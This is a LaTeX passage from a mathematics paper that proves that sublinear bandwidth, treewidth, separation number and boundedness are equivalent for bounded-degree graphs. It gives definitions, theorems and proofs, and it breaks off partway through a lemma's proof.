are the genus, the bandwidth, or the treewidth of a graph. The topic of this paper is
to discuss the relations between such parameters. We would like to determine how
they influence each other and what causes them to be large. To this end we will
mostly be interested in distinguishing between the cases when these parameters
are linear or sublinear in the number of vertices in the graph.
\medskip
We start with a few simple observations. Let $G=(V,E)$ be a graph on $n$
vertices. The \emph{bandwidth} of $G$ is denoted by $\bdw(G)$ and defined to be
the minimum positive integer $b$, such that there exists a labelling of the
vertices in $V$ by numbers $1,\dots,n$ so that the labels of every pair of
adjacent vertices differ by at most $b$. Clearly one reason for a graph to have
high bandwidth are vertices of high degree as $\bdw(G)\ge
\lceil\Delta(G)/2\rceil$, where $\Delta(G)$ is the maximum degree of $G$. It is
also clear that not all graphs of bounded maximum degree have sublinear
bandwidth: Consider for example a random bipartite graph $G$ on $n$ vertices with
bounded maximum degree. Indeed, with high probability, $G$ does not have small
bandwidth since in any linear ordering of its vertices there will be an edge
between the first $n/3$ and the last $n/3$ vertices in this ordering. The reason
behind this obstacle is that $G$ has good expansion properties (definitions and
exact statements are provided in Section~\ref{sec:results}). This implies that
graphs with sublinear bandwidth
cannot exhibit good expansion properties. One may ask whether the converse is
also true, i.e., whether the absence of big expanding subgraphs in bounded-degree
graphs must lead to small bandwidth. We will prove that this is indeed the case
via the existence of certain separators.
In fact, we will show a more general theorem in Section~\ref{sec:results}
(Theorem~\ref{thm:main}) which proves that the concepts of sublinear bandwidth,
sublinear treewidth, bad expansion properties, and sublinear separators are
equivalent for graphs of bounded maximum degree. In order to prove this
theorem, we will establish quantitative relations between the parameters involved
(see Theorem~\ref{thm:sep-band}, Theorem~\ref{thm:bound-trw}, and
Proposition~\ref{prop:band-bound}).
\medskip
As a byproduct of these relations we obtain sublinear bandwidth bounds for
several graph classes (see Section~\ref{sec:appl}). Since planar graphs are known
to have small separators~\cite{LipTar} for example, we get the following
result: The bandwidth of a planar graph on~$n$ vertices with maximum degree at
most~$\Delta$ is bounded from above by $\bdw(G) \le \frac{15n}{\log_\Delta(n)}$.
This extends a result of Chung~\cite{Chu} who proved that any $n$-vertex tree $T$
with maximum degree $\Delta$ has bandwidth at most $5n/\log_\Delta(n)$. Similar
upper bounds can be formulated for graphs of any fixed genus and, more generally,
for any graph class defined by a set of forbidden minors (see
Section~\ref{subsec:separators}).
In Section~\ref{subsec:universal} we conclude by considering
applications of these results to the domain of universal graphs and derive
implications such as the following. If $n$ is sufficiently large then any
$n$-vertex graph with minimum degree slightly above $\frac34n$ contains every
planar $n$-vertex graphs with bounded maximum degree as a subgraph (cf.\
Corollary~\ref{cor:planar-univers}).
\section{Definitions and Results}
\label{sec:results}
In this section we formulate our main results which provide relations between
the bandwidth, the treewidth, the expansion properties, and separators
of bounded degree graphs.
We need some further definitions.
For a graph $G=(V,E)$ and disjoint vertex sets $A,B\subset V$ we
denote by $E(A,B)$ the set of edges with one vertex in $A$ and one vertex in
$B$ and by $e(A,B)$ the number of such edges.
Next, we will introduce the notions of \emph{tree
decomposition} and \emph{treewidth}. Roughly speaking, a tree decomposition
tries to arrange the vertices of a graph in a tree-like manner and the
treewidth measures how well this can be done.
\begin{definition}[treewidth]
A tree decomposition of a graph $G=(V,E)$ is a pair $\left(\{X_i: i\in
I\},\right.$ $\left.T=(I,F)\right)$ where $\{X_i: i \in I\}$ is a family of
subsets $X_i\subseteq V$ and $T = (I,F)$ is a tree such that the following holds:
\begin{enumerate}[label=\rm (\alph{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item $\bigcup_{i \in I} X_i = V$,
\item for every edge $\{v,w\} \in E$ there exists $i \in I$ with $\{v,w\}
\subseteq X_i$,
\item for every $i,j,k \in I$ the following holds: if $j$ lies on the path
from $i$ to $k$ in $T$, then $X_i \cap X_k \subseteq X_j$.
\end{enumerate}
The width of $\left(\{X_i:i \in I\},T=(I,F)\right)$ is defined as
$\max_{i \in I} |X_i| -1$. The tree\-width $\trw(G)$ of $G$ is
the minimum width of a tree decomposition of $G$.
\end{definition}
It follows directly from the definition that $\trw(G)\le \bdw(G)$ for any
graph~$G$: if the vertices of $G$ are labelled by numbers $1,\dots,n$ such that
the labels of adjacent vertices differ by at most $b$, then $I:=[n-b]$,
$X_i:=\{i,\dots,i+b\}$ for $i\in I$ and $T:=(I,F)$ with $F:=\{\{i-1,i\}:2\le i
\le n-b\}$ define a tree decomposition of $G$ with width $b$.
A \emph{separator} in a graph is a small cut-set that splits the graph into
components of limited size.
\begin{definition}[separator, separation number]
Let $\tfrac12 \le \alpha < 1$ be a real number, $s\in\field{N}$ and $G=(V,E)$ a
graph.
A subset $S\subset V$ is said to be an $(s,\alpha)$-separator of $G$,
if there exist subsets $A,B \subset V$ such that
\begin{enumerate}[label=\rm (\alph{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item $V = A \dot\cup B \dot\cup S$,
\item $|S| \leq s$, $|A|, |B| \leq \alpha |V|$, and
\item $E(A,B) = \emptyset$.
\end{enumerate}
We also say that $S$ separates $G$ into $A$ and $B$.
The separation number $\s(G)$ of $G$ is the smallest $s$ such that all
subgraphs $G'$ of $G$ have an $(s,2/3)$-separator.
\end{definition}
A vertex set is said to be expanding, if it has many external neighbours.
We call a graph \emph{bounded}, if every sufficiently large subgraph
contains a subset which is not expanding.
\begin{definition}[expander, bounded]
Let $\eps>0$ be a real number, $b\in\field{N}$ and
consider graphs $G=(V,E)$ and $G'=(V',E')$.
We say that $G'$ is an $\eps$-expander if all subsets $U\subset
V'$ with $|U|\le |V'|/2$ fulfil $|N(U)|\ge \eps |U|$. (Here $N(U)$ is
the set of neighbours of vertices in $U$ that lie outside of $U$.)
The graph $G$ is called $(b,\eps)$-bounded, if no subgraph $G'\subset
G$ with $|V'| \ge b$ vertices is an $\eps$-expander.
Finally, we define the $\eps$-boundedness $\bdd(G)$ of $G$ to be the minimum
$b$ for which $G$ is $(b+1,\eps)$-bounded.
\end{definition}
There is a wealth of literature on expander graphs (see,
e.g., \cite{HooLinWig}). In particular, it is known that for example
(bipartite) random graphs with bounded maximum degree form a family of
$\eps$-expanders. We also loosely say that such graphs
have~\emph{good expansion properties}.
\medskip
As indicated earlier, our aim is to provide relations between the
parameters we defined above. A well known example of a result of this type is
the following theorem due to Robertson and Seymour which relates the
treewidth and the separation number of a graph.\footnote{In fact, their result
states that any graph $G$ has a $(\trw(G)+1,1/2)$-separator, and does not talk
about subgraphs of $G$. But since every
subgraph of $G$ has treewidth at most $\trw(G)$, it thus also has a
$(\trw(G)+1,1/2)$-separator and the result, as stated here, follows.}
\begin{theorem}[treewidth$\to$separator, \cite{RobSey_minors5}]
\label{thm:trw-sep}
All graphs $G$ have separation number
\begin{equation*}
\s(G) \le \trw(G)+1.
\end{equation*}
\end{theorem}
This theorem states that graphs with small treewidth have small separators.
By repeatedly extracting separators, one can show that (a
qualitatively different version of) the converse also holds:
$\trw(G)\le\mathcal{O}(\s(G)\log n)$ for a graph $G$ on $n$ vertices (see,
e.g., \cite[Theorem 20]{Bod}). In this paper, we use a similar but more
involved argument to show that one can establish the following relation linking the
separation number with the bandwidth of graphs with bounded maximum degree.
\begin{theorem}[separator$\to$bandwidth]
\label{thm:sep-band}
For each~$\Delta\ge 2$ every graph $G$ on $n$ vertices with maximum degree
$\Delta(G) \le \Delta$ has bandwidth
\begin{equation*}
\bdw(G) \le \frac{6n}{\log_{\Delta} (n/\s(G))}.
\end{equation*}
\end{theorem}
The proof of this theorem is provided in Section~\ref{sec:sep-band}.
Observe that Theorems~\ref{thm:trw-sep} and~\ref{thm:sep-band} together with the
obvious inequality $\trw(G)\le \bdw(G)$ tie the concepts of treewidth, bandwidth,
and separation number well together.
Apart from the somewhat negative statement of \emph{not having} a small separator,
what can we say about a graph with large tree- or bandwidth?
The next theorem states that such a graph must contain a big expander.
\begin{theorem}[bounded$\to$treewidth]
\label{thm:bound-trw}
Let $\eps > 0$ be constant. All graphs $G$ on $n$ vertices have treewidth
$\trw(G) \le 2\bdd(G) + 2\eps n$.
\end{theorem}
A result with similar implications was recently proved by Grohe and Marx
in~\cite{GroMar}. It shows that $b_{\eps}(G) < \eps n$ implies $\trw(G) \le 2\eps
n$.
For the sake of being self-contained we present our (short) proof of
Theorem~\ref{thm:bound-trw} in Section~\ref{sec:bound}. In addition, it is not
difficult to see that conversely the boundedness of a graph can be estimated via
its bandwidth -- which we prove in Section~\ref{sec:bound}, too.
\begin{proposition}[bandwidth$\to$bounded]
\label{prop:band-bound}
Let $\eps>0$ be constant. All graphs $G$ on $n$ vertices have $\bdd(G)\le 2
\bdw(G)/\eps$.
\end{proposition}
A qualitative consequence summarising the four results above is given in the following theorem. It states that if one
of the parameters bandwidth, treewidth, separation number, or boundedness is
sublinear for a family of bounded degree graphs, then so are the others.
\begin{theorem}[sublinear equivalence theorem]
\label{thm:main}
Let $\Delta$ be an arbitrary but fixed positive integer and consider a
hereditary class of graphs $\mbox{${ \mathcal C }$}$ such that all graphs in $\mbox{${ \mathcal C }$}$ have maximum
degree at most $\Delta$. Denote by $\mbox{${ \mathcal C }$}_n$ the set of those graphs in $\mbox{${ \mathcal C }$}$
with $n$ vertices. Then the following four properties are equivalent:
\begin{enumerate}[label=\rm (\arabic{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item\label{it:main:1}
For all $\beta_1>0$ there is $n_1$ s.t. $\trw(G)\le\beta_1 n$ for all
$G\in\mbox{${ \mathcal C }$}_n$ with $n\ge n_1$.
\item\label{it:main:2}
For all $\beta_2>0$ there is $n_2$ s.t. $\bdw(G)\le\beta_2 n$ for all
$G\in\mbox{${ \mathcal C }$}_n$ with $n\ge n_2$.
\item\label{it:main:3}
For all $\beta_3,\eps>0$ there is $n_3$ s.t. $\bdd(G)\le\beta_3 n$ for all
$G\in\mbox{${ \mathcal C }$}_n$ with $n\ge n_3$.
\item\label{it:main:4}
For all $\beta_4>0$ there is $n_4$ s.t. $\s(G)\le\beta_4 n$ for all
$G\in\mbox{${ \mathcal C }$}_n$ with $n\ge n_4$.
\end{enumerate}
\end{theorem}
The paper is organized as follows. Section~\ref{sec:proofs} contains the proofs
of all the results mentioned so far: First we derive Theorem~\ref{thm:main}
from Theorems~\ref{thm:trw-sep}, \ref{thm:sep-band},
\ref{thm:bound-trw} and Proposition~\ref{prop:band-bound}. Then
Section~\ref{sec:sep-band} is devoted to the proof of
Theorem~\ref{thm:sep-band}, whereas Section~\ref{sec:bound} contains the proofs
of Theorem~\ref{thm:bound-trw} and Proposition~\ref{prop:band-bound}.
Finally, in Section~\ref{sec:appl}, we apply our results to deduce that certain
classes of graphs have sublinear bandwidth and can therefore be embedded as
spanning subgraphs into graphs of high minimum degree.
\section{Proofs}\label{sec:proofs}
\subsection{Proof of Theorem~\ref{thm:main}}
\begin{proof}
\ref{it:main:1}$\Rightarrow$\ref{it:main:4}:\quad
Given $\beta_4 > 0$ set $\beta_1\mathrel{\mathop:}=\beta_4/2$, let $n_1$ be the
constant from~\ref{it:main:1} for this $\beta_1$, and set $n_4 \mathrel{\mathop:}=
\max\{n_1,2/\beta_4\}$. Now consider $G\in\mbox{${ \mathcal C }$}_n$ with $n \ge n_4$. By
assumption we have $\trw(G)\le\beta_1 n$ and thus we can apply
Theorem~\ref{thm:trw-sep} to conclude that
$\s(G)\le\trw(G) + 1\le\beta_1 n + 1\le(\beta_4/2+1/n)n
\le \beta_4 n$.
\ref{it:main:4}$\Rightarrow$\ref{it:main:2}:\quad
Given $\beta_2 > 0$ let $d:=\max\{2,\Delta\}$, set $\beta_4\mathrel{\mathop:}=
d^{-6/\beta_2}$, get $n_4$ from~\ref{it:main:4} for this~$\beta_4$, and set
$n_2\mathrel{\mathop:}= n_4$. Let $G\in\mbox{${ \mathcal C }$}_n$ with $n \ge n_2$. We conclude
from~\ref{it:main:4} and Theorem~\ref{thm:sep-band} that
\begin{equation*}
\bdw(G)\le\frac{6n}{\log_{d}n-\log_{d}\s(G)}
\le\frac{6n}{\log_{d}n-\log_{d}(d^{-6/\beta_2}n)}
= \beta_2 n.
\end{equation*}
\ref{it:main:2}$\Rightarrow$\ref{it:main:3}:\quad
Given $\beta_3, \eps > 0$ set $\beta_2\mathrel{\mathop:}=\eps\beta_3/2$, get
$n_2$ from~\ref{it:main:2} for this $\beta_2$ and set $n_3\mathrel{\mathop:}= n_2$.
By~\ref{it:main:2} and Proposition~\ref{prop:band-bound} we get for
$G\in\mbox{${ \mathcal C }$}_n$ with $n \ge n_3$ that
$\bdd(G)\le2\bdw(G)/\eps\le2\beta_2n/\eps\le\beta_3 n$.
\ref{it:main:3}$\Rightarrow$\ref{it:main:1}:\quad
Given $\beta_1>0$, set $\beta_3\mathrel{\mathop:}=\beta_1/4$, $\eps\mathrel{\mathop:}=\beta_1/4$ and
get $n_3$ from~\ref{it:main:3} for this $\beta_3$ and $\eps$, and set
$n_1 \mathrel{\mathop:}= n_3$. Let $G\in\mbox{${ \mathcal C }$}_n$ with $n \ge n_1$.
Then~\ref{it:main:3} and Theorem~\ref{thm:bound-trw} imply
$\trw(G)\le2\bdd(G)+2\eps n\le2\beta_3n+2(\beta_1/4)n=\beta_1n$.
\end{proof}
\subsection{Separation and bandwidth}\label{sec:sep-band}
For the proof of Theorem~\ref{thm:sep-band} we will use the following
decomposition result which roughly states the following. If the removal of
a small separator $S$ decomposes the vertex set of a graph $G$ into relatively
small components $R_i\dot\cup P_i$ such that the vertices in $P_i$ form a ``buffer''
between the vertices in the separator $S$ and the set of remaining vertices
$R_i$ in the sense that $\dist_G(S,R_i)$ is sufficiently big,
then the bandwidth of $G$ is small.
\begin{lemma}[decomposition lemma]
\label{lem:decomposition}
Let $G=(V,E)$ be a graph and $S$, $P$, and $R$ be vertex sets
such that $V=S\dot\cup P\dot\cup R$. For $b,r\in\field{N}$ with $b\ge 3$ assume further that there are
decompositions $P=P_1\dot\cup\dots\dot\cup P_b$ and
$R=R_1\dot\cup\dots\dot\cup R_b$ of $P$ and $R$, respectively, such that the
following properties are satisfied:
\begin{enumerate}[label=\rm (\roman{*}),leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item\label{it:dec:i} $|R_i|\le r$,
\item\label{it:dec:ii} $e(R_i\dot\cup P_i,R_j\dot\cup P_j)=0$ for all $1\le
i<j\le b$,
\item\label{it:dec:iii} $\dist_G(u,v)\ge \lfloor b/2\rfloor$ for all $u\in
S$ and $v\in R_i$ with $i\in[b]$.
\end{enumerate}
Then $\bdw(G)< 2(|S|+|P|+r)$.
\end{lemma}
\begin{proof}
Assume we have $G=(V,E)$, $V=S\dot\cup P\dot\cup R$ and $b,r \in \field{N}$ with the
properties stated above.
Our first goal is to partition $V$ into pairwise disjoint sets $B_1,\dots,B_b$,
which we call \emph{buckets}, and that satisfy the following property:
\begin{equation}\label{eq:dec:edges}
\text{If $\{u,v\}\in E$ for $u\in B_i$ and $v\in B_j$ then $|i-j|\le 1$.}
\end{equation}
To this end all vertices of $R_i$ are placed into bucket $B_i$ for each
$i \in [b]$ and the vertices of $S$ are placed into bucket $B_{\lceil
b/2\rceil}$. The remaining vertices from the sets $P_i$ are distributed over
the buckets according to their distance from $S$: vertex $v \in P_{i}$ is
assigned to bucket $B_{j(v)}$ where $j(v)\in [b]$ is defined by
\begin{equation}\label{eq:dec:jv}
j(v):=\begin{cases}
i & \text{ if } \dist(S,v) \ge |\lceil b/2\rceil-i|, \\
\lceil b/2\rceil - \dist(S,v) & \text{ if } \dist(S,v) < \lceil b/2\rceil-i,
\\ \lceil b/2\rceil + \dist(S,v) & \text{ if } \dist(S,v) <
i-\lceil b/2\rceil.
\end{cases}
\end{equation}
This placement obviously satisfies
\begin{equation}\label{eq:dec:B}
|B_i|\le|S|+|P|+|R_i|\le|S|+|P|+r
\end{equation}
by construction and condition~\ref{it:dec:i}.
Moreover, we claim that it guarantees condition~\eqref{eq:dec:edges}. Indeed, let $\{u,v\}\in E$
be an edge. If $u$ and $v$ are both in $S$ then clearly~\eqref{eq:dec:edges} is
satisfied. Thus it remains to consider the case where, without loss of
generality, $u\in R_i\dot\cup P_i$ for some $i\in [b]$. By condition~\ref{it:dec:ii} this
implies $v\in S\dot\cup R_i\dot\cup P_i$. First assume that $v\in S$. Thus
$\dist(u,S)=1$ and from condition~\ref{it:dec:iii} we infer that $u\in P_i$.
Accordingly $u$ is placed into bucket
$B_{j(u)}\in\{B_{\lceil b/2\rceil-1},B_{\lceil b/2\rceil},B_{\lceil
b/2\rceil+1}\}$ by~\eqref{eq:dec:jv} and $v$ is placed into
bucket~$B_{\lceil b/2\rceil}$ and so we also get~\eqref{eq:dec:edges} in this
case. If both $u,v\in R_i\dot\cup P_i$, on the other hand, we are clearly done if
$u,v\in R_i$. So assume without loss of generality, that $u\in P_i$. If $v\in
P_i$ then we conclude from $|\dist(S,u)-\dist(S,v)|\le 1$
and~\eqref{eq:dec:jv} that $u$ is placed into bucket $B_{j(u)}$ and $v$ into
$B_{j(v)}$ with $|j(u)-j(v)|\le 1$. If $v\in R_i$, finally, observe
that $|\dist(S,u)-\dist(S,v)|\le 1$ together with condition~\ref{it:dec:iii}
implies that $\dist(S,u)\ge \lfloor b/2\rfloor-1$ and so $u$ is placed into
bucket $B_{j(u)}$ with $|j(u)-i|\le 1$, where $i$ is the index such that $v\in B_i$,
by~\eqref{eq:dec:jv}.
Thus we also get~\eqref{eq:dec:edges} in this last case.
Now we are ready to construct an ordering of~$V$
respecting the desired bandwidth bound. We start with the vertices in bucket
$B_1$, order them arbitrarily, proceed to the vertices in bucket $B_2$, order
them arbitrarily, and so on, up to bucket $B_b$. By
condition~\eqref{eq:dec:edges} this gives an ordering with bandwidth at most
twice as large as the largest bucket and thus we conclude from~\eqref{eq:dec:B}
that $\bdw(G) < 2(|S|+|P|+r)$.
\end{proof}
A decomposition of the vertices of $G$ into buckets as in the proof of
Lemma~\ref{lem:decomposition} is also called a path partition of $G$ and
appears, e.g., in~\cite{DujSudWoo}.
Before we get to the proof of Theorem~\ref{thm:sep-band}, we will establish
the following technical observation about labelled trees.
\begin{proposition}\label{prop:tree}
Let~$b$ be a positive real,
$T=(V,E)$ be a tree with $|V|\ge 3$, and $\ell:V\to[0,1]$ be a real valued labelling of its
vertices such that $\sum_{v\in V}\ell(v)\le 1$.
Denote further for all $v\in V$ by $L(v)$ the set of leaves that
are adjacent to $v$ and suppose that $\ell(v)+\sum_{u\in L(v)}\ell(u)\ge|L(v)|/b$.
Then $T$ has at most $b$ leaves in total.
\end{proposition}
\begin{proof}
Let $L\subset V$ be the set of leaves of $T$ and $I:=V\setminus L$ be the set
of internal vertices. Clearly
\begin{equation*}
1 \ge \sum_{v\in V}\ell(v)
=\sum_{v\in I}\left(\ell(v)+\sum_{u\in L(v)}\ell(u)\right)
\ge\sum_{v\in I}\frac{|L(v)|}{b}
=\frac{|L|}{b}
\end{equation*}
which implies the assertion.
\end{proof}
The idea of the proof of Theorem~\ref{thm:sep-band} is to repeatedly extract
separators from~$G$ and the pieces that result from the removal of such
separators. We denote the union of these separators by $S$, put all remaining
vertices with small distance from $S$ into sets $P_i$, and all other
vertices into sets $R_i$. Then we can apply the decomposition lemma
(Lemma~\ref{lem:decomposition}) to these sets $S$, $P_i$, and $R_i$. This,
together with some technical calculations, will give the desired bandwidth bound
for~$G$.
\begin{proof}[of Theorem~\ref{thm:sep-band}] Let $G = (V,E)$ be a graph on $n$
vertices with maximum degree $\Delta\ge 2$.
Observe that the desired bandwidth bound is trivial if $\Delta=2$ or if
$\log_{\Delta} n -\log_{\Delta}\s(G)\le 6$, so assume in the following that
$\Delta \ge 3$ and $\log_{\Delta} n -\log_{\Delta}\s(G)>6$. Define
\begin{equation}\label{eq:sep-band:bt}
\beta:=\log_{\Delta} n -\log_{\Delta} \s(G)
\qquad\text{and}\qquad
b:=\left\lfloor\beta\right\rfloor \ge 6
\end{equation}
and observe that with this choice of $\beta$ our aim is to show that $\bdw(G)\le
6n/\beta$.
The goal is to construct a partition $V = S\dot\cup P \dot\cup R$ with the
properties required by Lemma~\ref{lem:decomposition}. For this
purpose we will recursively use the fact that $G$ and its subgraphs have separators of
size at most $\s(G)$.
In the $i$-th round we will identify separators $S_{i,k}$ in $G$ whose removal
splits $G$ into parts $V_{i,1},\dots,V_{i,b_i}$.
The details are as follows.
In the first round let $S_{1,1}$ be an arbitrary $(\s(G),2/3)$-separator in $G$
that separates $G$ into $V_{1,1}$ and $V_{1,2}$ and set
$b_1:=2$.
In the $i$-th round, $i>1$, consider each of the sets $V_{i-1,j}$ with
$j\in[b_{i-1}]$. If $|V_{i-1,j}|\le 2n/b$ then let
$V_{i,j'}:=V_{i-1,j}$, otherwise choose an $(\s(G),2/3)$-separator $S_{i,k}$
that separates $G[V_{i-1,j}]$ into sets $V_{i,j'}$ and $V_{i,j'+1}$ (where $k$
and $j'$ are appropriate indices, for simplicity we do not specify
them further). Let $S_i$ denote the union of all separators
constructed in this way (and in this round).
This finishes the $i$-th round. We stop this procedure as soon as all sets
$V_{i,j'}$ have size at most $2n/b$ and denote the corresponding $i$ by
$i^*$. Then $b_{i^*}$ is the number of sets $V_{i^*,j'}$ we end up with in the
last iteration. Let further $x_S$ be the number of separators $S_{i,k}$
extracted from~$G$ during this process in total.
\begin{claim}\label{cl:sep-band}
We have $b_{i^*}\le b$ and $x_S\le b-1$.
\end{claim}
We will postpone the proof of this fact and first show how it implies the
theorem.
Set $S:=\bigcup_{i\in[i^*]}S_i$, for $j\in[b_{i^*}]$ define
\begin{equation*}
P_j:=\{v \in V_{i^*,j} : \dist(v,S) < \lfloor b/2\rfloor\}
\qquad\text{and}\qquad R_j = V_{i^*,j} \setminus P_j,
\end{equation*}
set $P_j=R_j=\emptyset$ for $b_{i^*}<j\le b$ and finally define
$P:=\bigcup_{j\in[b]} P_j$ and $R:=\bigcup_{j\in[b]} R_j$.
We claim that $V=S\dot\cup P\dot\cup R$ is a partition that satisfies the requirements
of the decomposition lemma (Lemma~\ref{lem:decomposition}) with parameter~$b$
and~$r=2n/b$. To check this, observe first that for all $i\in[i^*]$ and
$j,j'\in[b_i]$ we have $e(V_{i,j},V_{i,j'})=0$ since $V_{i,j}$ and $V_{i,j'}$
were separated by some $S_{i',k}$. It follows that $e(R_j\dot\cup P_j,R_{j'}\dot\cup
P_{j'})=e(V_{i^*,j},V_{i^*,j'})=0$ for all $j,j'\in[b_{i^*}]$. Trivially
$e(R_j\dot\cup P_j,R_{j'}\dot\cup P_{j'})=0$ for all $j\in[b]$ and $b_{i^*}<j'\le b$
and therefore we get condition~\ref{it:dec:ii} of Lemma~\ref{lem:decomposition}.
Moreover, condition~\ref{it:dec:iii} is satisfied by the definition of the sets
$P_j$ and $R_j$ above. To verify condition~\ref{it:dec:i} note that
$|R_j|\le|V_{i^*,j}|\le2n/b=r$ for all $j\in[b_{i^*}]$ by the choice of~$i^*$ and
$|R_j|=0$ for all $b_{i^*}<j\le b$. Accordingly we can apply
Lemma~\ref{lem:decomposition} and infer that
\begin{equation}\label{eq:sep-band:bdw}
\bdw(G) \le 2\left(|S|+|P|+\frac{2n}{b}\right).
\end{equation}
In order to establish the desired bound on the bandwidth, we thus need to show
that $|S|+|P| \le n/\beta$. We first estimate the size of $S$. By
Claim~\ref{cl:sep-band} at most $x_S\le b-1$ separators have been extracted in
total, which implies
\begin{equation}\label{eq:sep-band:sep}
|S|\le x_S\cdot\s(G)\le(b-1)\s(G).
\end{equation}
Furthermore all vertices $v\in P$ satisfy $\dist_G(v,S)\le \lfloor b/2\rfloor-1$
by definition. As~$G$ has maximum degree $\Delta$ there are at most
$|S|(\Delta^{\lfloor b/2\rfloor}-1)/(\Delta-1)$ vertices $v\in V \setminus S$
with this property and hence
\begin{equation*}\begin{split}
|S| + |P|
&\le|S| \left(1+\frac{\Delta^{\lfloor b/2\rfloor}-1}{\Delta-1}\right)
\le |S| \frac{\Delta^{\beta/2}}{\Delta-3/2}\\
&\le \frac{(b-1) \s(G)}{(\Delta-3/2)} \sqrt{\frac{n}{\s(G)}}
= \frac{(b-1) n}{(\Delta-3/2)} \sqrt{\frac{\s(G)}{n}}
\end{split}\end{equation*}
where the second inequality holds for any $\Delta\ge3$ and $b\ge6$ and the third
inequality follows from~\eqref{eq:sep-band:bt} and~\eqref{eq:sep-band:sep}.
It is easy to verify that for any $\Delta\ge3$ and $x\ge\Delta^6$ we have
$(\Delta-3/2)\sqrt{x}\ge\tfrac98\log^2_{\Delta} x$. This together
with~\eqref{eq:sep-band:bt} gives $(\Delta-3/2)\sqrt{n/\s(G)}\ge\tfrac98\beta^2$
and hence we get
\begin{align}\label{eq:sep-band:SP}
|S| + |P| \le \frac{8(b-1) n}{9\beta^2}\,.
\end{align}
As $6\le b = \lfloor\beta\rfloor$ it is not difficult to check that
\[
\frac{8(b-1)}{9\beta^2} + \frac 2b \le\frac{3}{\beta} \,.
\]
Together with~\eqref{eq:sep-band:bdw} and~\eqref{eq:sep-band:SP} this gives our
bound.
It remains to prove Claim~\ref{cl:sep-band}. Notice that the process of
repeatedly separating $G$ and its subgraphs can be seen as a binary tree~$T$
on vertex set~$W$ whose internal nodes represent the extraction of a separator
$S_{i,k}$ for some $i$ (and thus the separation of a subgraph of $G$ into two sets
$V_{i,j}$ and $V_{i,j'}$) and whose leaves represent the sets $V_{i,j}$ that
are of size at most $2n/b$. Clearly the number of leaves of $T$ is $b_{i^*}$
and the number of internal nodes $x_S$. As $T$ is a binary tree we conclude
$x_S=b_{i^*}-1$ and thus it suffices to show that $T$ has at most $b$ leaves in
order to establish the claim. To this end we would like to apply
Proposition~\ref{prop:tree}. Label an internal node of $T$ that
represents a separator $S_{i,k}$ with $|S_{i,k}|/n$, a leaf representing $V_{i,j}$ with
$|V_{i,j}|/n$ and denote the resulting labelling by $\ell$. Clearly we have
$\sum_{w\in W}\ell(w)=1$. Moreover we claim that
\begin{equation}\label{eq:sep-band:ell}
\ell(w)+\sum_{u\in L(w)}\ell(w)\ge|L(w)|/b
\qquad\text{for all $w\in W$}
\end{equation}
where $L(w)$ denotes the set of leaves that are children of $w$. Indeed, let
$w\in W$, notice that $|L(w)|\le 2$ as $T$ is a binary tree, and let $u$ and
$u'$ be the two children of $w$. If $|L(w)|=0$ we are done. If $|L(w)|>0$ then
$w$ represents a $(2/3,s(G))$-separator $S(w):=S_{i-1,k}$ that separated a graph
$G[V(w)]$ with $V(w):=V_{i-1,j}\ge 2n/b$ into two sets $U(w):=V_{i,j'}$ and
$U'(w):=V_{i,j'+1}$ such that
$|U(w)|+|U'(w)|+|S(w)|=|V(w)|$. In the case that $|L(w)|=2$ this
implies
\begin{equation*}
\ell(w)+\ell(u)+\ell(u')=\frac{|S(w)|+|U(w)|+|U'(w)|}{n}
=\frac{|V(w)|}{n}
\ge 2/b
\end{equation*}
and thus we get~\eqref{eq:sep-band:ell}. If $|L(w)|=1$ on the other hand then,
without loss of generality, $u$ is a leaf of $T$ and $|U'(w)|>2n/b$. Since
$S(w)$ is a $(2/3,s(G))$-separator however we know that $|V(w)|\ge\frac32|U'(w)|$ and
hence
\begin{equation*}\begin{split}
\ell(w)+\ell(u)&=\frac{|S(w)|+|U(w)|}{n}
=\frac{|S(w)|+|V(w)|-|U'(w)|-|S(w)|}{n} \\
&\ge\frac{\frac32|U'(w)|-|U'(w)|}{n}
\ge\frac{\frac12(2n/b)}{n}
\end{split}\end{equation*}
which also gives~\eqref{eq:sep-band:ell} in this case.
Therefore we can apply Proposition~\ref{prop:tree} and infer that $T$ has at
most $b$ leaves as claimed.
\end{proof}
\subsection{Boundedness}\label{sec:bound}
In this section we study the relation between boundedness, bandwidth and
treewidth. We first give a proof of Proposition~\ref{prop:band-bound}.
\begin{proof}[of Proposition~\ref{prop:band-bound}]
We have to show that for every graph $G$ and every $\eps>0$
the inequality $b_{\eps}(G) \le 2 \bdw(G) / \eps$ holds.
Suppose that $G$ has $n$ vertices and let $\sigma: V \to [n]$ be an
arbitrary labelling of $G$.
Furthermore assume that $V' \subseteq V$
with $|V'| = b_{\eps}(G)$ induces an $\eps$-expander in $G$.
Define $V^*\subset V'$ to be the first $b_{\eps}(G)/2=|V'|/2$ vertices of $V'$
with respect to the ordering $\sigma$. Since $V'$ induces an $\eps$-expander in
$G$ there must be at least $\eps b_{\eps}(G)/2$ vertices in $N^*:=N(V^*)\cap V'$.
Let $u$ be the vertex in $N^*$
with maximal $\sigma(u)$ and $v\in V^*\cap N(u)$. As $u\not\in V^*$ and
$\sigma(u')>\sigma(v')$ for all $u'\in N^*$ and $v'\in V^*$ by the choice of
$V^*$ we have $|\sigma(u)-\sigma(v)|\ge|N^*|\ge\eps b_{\eps}(G)/2$.
Since this is true for every labelling $\sigma$ we can deduce
that $b_{\eps}(G) \le 2\bdw(G) / \eps$.
\end{proof}
The remainder of this section is devoted to the proof of
Theorem~\ref{thm:bound-trw}. We will use the following lemma which establishes
a relation between boundedness and certain separators.
\begin{lemma}[bounded$\to$separator] \label{lem:bound-sep}
Let $G$ be a graph on $n$ vertices and let $\eps > 0$. If $G$ is
$(n/2,\eps)$-bounded then $G$ has a $(2\eps n/3, 2/3)$-separator.
\end{lemma}
\begin{proof}
Let $G = (V,E)$ with $|V|=n$ be $(n/2,\eps)$-bounded for $\eps>0$.
It follows that every subset $V' \subseteq V$ with $|V'|
\ge n/2$ induces a subgraph $G' \subseteq G$ with the following property:
there is $W \subseteq V'$ such that $|W| \le |V'|/2$ and $|N_{G'}(W)| \le \eps
|W|$.
We use this fact to construct a $(2\eps n/3, 2/3)$-separator in the following
way:
\begin{enumerate}[leftmargin=*,itemsep=0mm,parsep=0mm,topsep=2mm]
\item Define $V_1:=V$ and $i:=1$.
\item\label{it:Sep_Konstr_1} Let $G_i:=G[V_i]$.
